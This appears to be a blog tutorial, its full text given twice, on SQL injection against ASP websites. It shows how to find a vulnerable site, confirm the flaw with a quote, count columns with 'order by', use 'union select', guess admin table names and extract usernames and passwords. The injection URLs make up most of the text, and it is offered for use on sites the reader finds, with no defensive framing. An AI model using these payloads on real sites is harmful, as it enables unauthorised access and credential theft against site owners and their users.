The sql injection on asp
So first of all we will find some site that is Vulnerable and is on .asp
So assume that u got a site with the name of
Code:
http://www.target.com/
now find page where the site is vul to sql injection...
You can check the Vulnerability by adding single quotation '
at the end of URL like
Code:
http://www.target.com/product.asp?id=13'
If u get this error...
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #
Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...
So we will have an error on this query
Code:
http://www.target.com/product.asp?id=13 order by 11#
But when we will use this query, we will not get any error.
Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.
Now we will write the query as...
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...
So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.
and then change column name with passwords column name
you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for , enjoy !!
So first of all we will find some site that is Vulnerable and is on .asp
So assume that u got a site with the name of
Code:
http://www.target.com/
now find page where the site is vul to sql injection...
You can check the Vulnerability by adding single quotation '
at the end of URL like
Code:
http://www.target.com/product.asp?id=13'
If u get this error...
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #
Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...
So we will have an error on this query
Code:
http://www.target.com/product.asp?id=13 order by 11#
But when we will use this query, we will not get any error.
Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.
Now we will write the query as...
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...
So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.
and then change column name with passwords column name
you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hopes i will helped you , in this type of injection we don't get much working scripts to get tables etc if i get working ones i will update this tut soon ... by me for , enjoy !!
0 comments:
Post a Comment